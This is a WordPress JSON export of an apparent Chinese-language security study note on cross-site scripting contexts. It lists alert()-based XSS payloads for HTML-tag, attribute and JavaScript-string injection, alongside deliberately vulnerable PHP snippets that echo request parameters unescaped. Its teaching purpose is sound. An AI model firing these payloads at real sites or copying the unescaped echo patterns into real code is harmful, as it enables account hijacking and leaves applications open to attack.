{"id":250,"date":"2020-08-09T17:03:03","date_gmt":"2020-08-09T09:03:03","guid":{"rendered":"http:\/\/note.systw.net\/note\/?p=250"},"modified":"2024-02-21T19:56:06","modified_gmt":"2024-02-21T11:56:06","slug":"xss-contexts","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/250","title":{"rendered":"XSS contexts"},"content":{"rendered":"\n<div class=\"wp-block-jetpack-markdown\"><h3>XSS contexts<\/h3>\n<p>\u5e38\u898b\u7684Cross-site scripting context Breaking<br>\n*XSS between HTML tags<br>\n*XSS in HTML tag attributes<br>\n*XSS into JavaScript<\/p>\n<p>\u00a0<\/p>\n<hr>\n<h3>XSS between HTML tags<\/h3>\n<p>HTML Context<br>\nCase: &lt; tag&gt;You searched for $input. &lt; \/tag&gt;<\/p>\n<pre><code>$input example:\n&lt; svg onload=alert()&gt;\n&lt; \/tag&gt;&lt; svg onload=alert()&gt;\n&lt; script&gt;alert(document.domain)&lt; \/script&gt;\n&lt; img src=1 onerror=alert(1)&gt;\n<\/code><\/pre>\n<p>ex:<br>\n\u6b63\u5e38\u7db2\u5740<br>\n<code>http:\/\/xsswebsite\/xss.php<\/code><br>\n\u6b63\u5e38\u539f\u78bc<br>\n<code>Hello, &lt; ?=$_GET[\u201cname\u201d]?&gt;!<\/code><\/p>\n<p>\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS<br>\n<code>http:\/\/xsswebsite\/xss.php?name=&lt; svg onload=alert(1)&gt;<\/code><br>\n\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b<br>\n<code>Hello, &lt; svg onload=alert(1)&gt;!<\/code><\/p>\n<p>\u00a0<\/p>\n<hr>\n<h3>XSS in HTML tag attributes<\/h3>\n<p>Attribute Context<br>\nCase: &lt; tag attribute=\u201c$input\u201d&gt;<\/p>\n<pre><code>$input example:\n&quot;&gt;&lt; svg onload=alert()&gt;\n&quot;&gt;&lt; svg onload=alert()&gt;&lt; b attr=&quot;\n&quot; onmouseover=alert() &quot;\n&quot;onmouseover=alert()\/\/\n&quot;autofocus\/onfocus=&quot;alert()\n<\/code><\/pre>\n<h4>URL Reflection<\/h4>\n<p>ex:<br>\n\u6b63\u5e38\u7db2\u5740<br>\nhttp:\/\/xsswebsite\/xss.php<br>\n\u6b63\u5e38\u539f\u78bc<br>\n<code>&lt; form action=\u201d&lt; ?=$_SERVER[\u201cPHP_SELF\u201d]?&gt;\u201d method=\u201dPOST\u201d&gt;<\/code><\/p>\n<p>\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS<br>\n<code>http:\/\/xsswebsite\/xss.php\/\u201d&gt;&lt; svg onload=alert(1)&gt;<\/code><br>\nps:\n\u4ee5\u4e0a\u53ef\u80fd\u6703\u88abbrowser XSS filtering\u64cb\u4f4f<\/p>\n<p>\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b<br>\n<code>&lt; form action=\u201d\/xss.php\/\u201d&gt;&lt; svg onload=alert(1)&gt;\u201d method=\u201dPOST\u201d&gt;<\/code><\/p>\n<p>\u00a0<\/p>\n<h4>Tag Breaking\u5728\u91cd\u5efa\u65b0tag<\/h4>\n<p>ex:<br>\n\u6b63\u5e38\u7db2\u5740<br>\n<code>http:\/\/xsswebsite\/xss.php?b1=1<\/code><br>\n\u6b63\u5e38\u539f\u78bc<br>\n<code>&lt; input type=&quot;text&quot; name=&quot;b1&quot; value=&quot;&lt; ?=$_GET[\u2018b1\u2019]?&gt;&quot;&gt;<\/code><\/p>\n<p>\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS<br>\n<code>http:\/\/xsswebsite\/xss.php?b1=&quot;&gt;&lt; svg onload=alert(1)&gt;<\/code><br>\n\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b<br>\n<code>&lt; input type=&quot;text&quot; name=&quot;b1&quot; value=&quot;&quot;&gt;&lt; svg onload=alert(1)&gt;&quot;&gt;<\/code><\/p>\n<p>\u00a0<\/p>\n<h4>No Tag Breaking<\/h4>\n<p>ex:<br>\n\u6b63\u5e38\u7db2\u5740<br>\n<code>http:\/\/xsswebsite\/xss.php?b3=1<\/code><br>\n\u6b63\u5e38\u539f\u78bc<br>\n<code>&lt; input type=&quot;text&quot; name=&quot;b3&quot; value=&quot;&lt; ?=filtertag($_GET[\u201cb3\u201d])?&gt;&quot;&gt;<\/code><br>\n\/\/filtertag() \u6703\u628a &lt; \u548c &gt; \u904e\u6ffe<\/p>\n<p>\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS<br>\n<code>http:\/\/xsswebsite\/xss.php?b3=\u201d onmouseover=alert(1)\/\/<\/code><\/p>\n<p>\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b\uff0c\u5de6\u908a\u628a\u96d9\u5f15\u865f\u9589\u5408\uff0c\u53f3\u908a\u96d9\u5f15\u865f\u900f\u904e\u96d9\u659c\u7dda\u8b8a\u6210\u8a3b\u89e3\uff0c<br>\n\u7576\u53d7\u5bb3\u8005\u79fb\u5230\u6b64\u8f38\u5165\u6846\u6642\u89f8\u767c\u5f48\u7a97<br>\n<code>&lt; input type=&quot;text&quot; name=&quot;b3&quot; value=&quot;\u201d onmouseover=alert(1)\/\/&quot;&gt;<\/code><\/p>\n<p>\u00a0<\/p>\n<hr>\n<h3>XSS into JavaScript<\/h3>\n<p>JavaScript Context<br>\nCase: &lt; script&gt; var new something = \u2018$input\u2019; &lt; \/script&gt;<\/p>\n<pre><code>$input example:\n'-alert()-'\n'-alert()\/\/'\n'}alert(1);{'\n'}%0Aalert(1);%0A{'\n&lt; \/script&gt;&lt; svg onload=alert()&gt;\n<\/code><\/pre>\n<h4>\u9589\u5408\u539f\u672cjs tag<\/h4>\n<p>ex:<br>\n\u6b63\u5e38\u7db2\u5740<br>\n<code>http:\/\/xsswebsite\/xss.php?v1=1<\/code><br>\n\u6b63\u5e38\u539f\u78bc<br>\n<code>&lt; script&gt;  var v1 = '&lt; ?=$_GET[\u201cv1\u201d]?&gt;';  &lt; \/script&gt;<\/code><\/p>\n<p>\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS<br>\n<code>http:\/\/xsswebsite\/xss.php?v1=&lt; \/script&gt;&lt; svg onload=alert(1)&gt;<\/code><\/p>\n<p>\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b\uff0c<br>\n<code>&lt; script&gt; var v1 = '&lt; \/script&gt;&lt; svg onload=alert(1)&gt;'; &lt; \/script&gt;<\/code><\/p>\n<p>\u00a0<\/p>\n<h4>\u9589\u5408\u55ae\u5f15\u865f\u4e26\u4f7f\u7528-\u7b26\u865f\u9023\u63a5js code<\/h4>\n<p>ex:<br>\n\u6b63\u5e38\u7db2\u5740<br>\n<code>http:\/\/brutelogic.com.br\/xss.php?v3=1<\/code><br>\n\u6b63\u5e38\u539f\u78bc<br>\n<code>&lt; script&gt;  var v3 = '';  &lt; \/script&gt;<\/code><br>\n\/\/filterjstag() \u6703\u628ajavascript tag\u904e\u6ffe<\/p>\n<p>\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS<br>\n<code>http:\/\/brutelogic.com.br\/xss.php?v3='-alert(1)-'<\/code><\/p>\n<p>\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b<br>\n<code>&lt; script&gt;  var v3 = ' '-alert(1)-' '; &lt; \/script&gt;<\/code><\/p>\n<p>\u00a0<\/p>\n<h4>Escaped Js<\/h4>\n<p>ex:<br>\n\u6b63\u5e38\u7db2\u5740<br>\n<code>http:\/\/brutelogic.com.br\/xss.php?v5=1<\/code><br>\n\u6b63\u5e38\u539f\u78bc<br>\n<code>&lt; script&gt;  var v5 = '&lt; ?=filterjstagv2($_GET[\u201cv5\u201d])?&gt;';  &lt; \/script&gt;<\/code><br>\n\/\/filterjstagv2() \u6703\u628ajavascript tag\u548c\u55ae\u5f15\u865f\u904e\u6ffe<\/p>\n<p>\u6b63\u5e38\u7db2\u5740\u5f8c\u63d2\u5165XSS<br>\n<code>http:\/\/brutelogic.com.br\/xss.php?v5='-alert(1)-\/\/<\/code><\/p>\n<p>\u56e0\u70ba\u539f\u78bc\u6703\u6539\u8b8a\u5982\u4e0b\uff0c\u5de6\u908a\u7528\u53cd\u659c\u7dda\u8df3\u812b\u55ae\u5f15\u865f\uff0c\u53f3\u908a\u7528\u96d9\u659c\u7dda\u5c07\u55ae\u5f15\u865f\u8b8a\u8a3b\u89e3<br>\n<code>&lt; script&gt; var v5 = ''-alert(1)-\/\/'; &lt; \/script&gt;<\/code><\/p>\n<p>\u00a0<\/p>\n<hr>\n<p>\u00a0<\/p>\n<p>refer<br>\nhttps:\/\/github.com\/s0md3v\/AwesomeXSS<br>\nhttps:\/\/portswigger.net\/web-security\/cross-site-scripting\/contexts<br>\nhttps:\/\/www.anquanke.com\/post\/id\/86585<br>\nhttps:\/\/brutelogic.com.br\/blog\/the-7-main-xss-cases-everyone-should-know\/<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[],"class_list":["post-250","post","type-post","status-publish","format-standard","hentry","category-clientside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":145,"url":"https:\/\/systw.net\/note\/archives\/145","url_meta":{"origin":250,"position":0},"title":"XSS","author":"raymond","date":"2020 \u5e74 8 \u6708 7 \u65e5","format":false,"excerpt":"XSS(cross-site scripting)\uff1aattacker uses a web appl\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1250,"url":"https:\/\/systw.net\/note\/archives\/1250","url_meta":{"origin":250,"position":1},"title":"DOM XSS in third-party","author":"raymond","date":"2023 \u5e74 2 \u6708 18 \u65e5","format":false,"excerpt":"\u73fe\u4ee3 Web \u61c9\u7528\u7a0b\u5f0f\u901a\u5e38\u662f\u4f7f\u7528\u8a31\u591a\u7b2c\u4e09\u65b9\u7a0b\u5f0f\u5eab\u548c\u6846\u67b6\u5efa\u7acb\u7684\uff0c\u9019\u4e9b\u7a0b\u5f0f\u5eab\u548c\u6846\u67b6\u901a\u5e38\u70ba\u958b\u767c\u4eba\u54e1\u63d0\u4f9b\u9644\u52a0\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1267,"url":"https:\/\/systw.net\/note\/archives\/1267","url_meta":{"origin":250,"position":2},"title":"DOM XSS to websocket","author":"raymond","date":"2023 \u5e74 2 \u6708 21 \u65e5","format":false,"excerpt":"\u5982\u679c\u9801\u9762\u4ee5\u4e0d\u5b89\u5168\u7684\u65b9\u5f0f\u8655\u7406\u50b3\u5165\u7684 Web \u8a0a\u606f\uff0c\u4f8b\u5982\uff0c\u672a\u5728\u4e8b\u4ef6\u5075\u807d\u5668\u4e2d\u6b63\u78ba\u9a57\u8b49\u50b3\u5165\u8a0a\u606f\u7684\u4f86\u6e90\uff0c\u5247\u4e8b\u4ef6\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1264,"url":"https:\/\/systw.net\/note\/archives\/1264","url_meta":{"origin":250,"position":3},"title":"DOM XSS to open redirection","author":"raymond","date":"2023 \u5e74 2 \u6708 19 \u65e5","format":false,"excerpt":"\u653b\u64ca\u8005\u5982\u679c\u53ef\u4ee5\u5f71\u97ff\u8de8\u57df\u7528\u7684sink\u6642\uff0c\u5c31\u6703\u51fa\u73fe\u57fa\u65bc DOM \u7684\u958b\u653e\u91cd\u5b9a\u5411\u6f0f\u6d1e\u3002\u5982\u679c\u6709\u6b64\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5229\u7528\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1255,"url":"https:\/\/systw.net\/note\/archives\/1255","url_meta":{"origin":250,"position":4},"title":"DOM XSS with reflected and store","author":"raymond","date":"2023 \u5e74 2 \u6708 18 \u65e5","format":false,"excerpt":"Reflected DOM XSS \u76ee\u6a19\u7db2\u7ad9\u6709xss\u6f0f\u6d1e\uff0c\u5728\u8acb\u6c42\u4e2d\u6ce8\u5165\\\"-alert(1)}\/\/\u53ef\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1259,"url":"https:\/\/systw.net\/note\/archives\/1259","url_meta":{"origin":250,"position":5},"title":"DOM XSS to cookie","author":"raymond","date":"2023 \u5e74 2 \u6708 21 \u65e5","format":false,"excerpt":"\u8b80\u53d6source\u6c92\u904e\u6ffe\u5c31\u628a\u4ed6\u5beb\u5230document.cookie\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u64cd\u4f5ccookie\u5167\u5bb9 \u8209\u4f8b\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=250"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/250\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=250"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}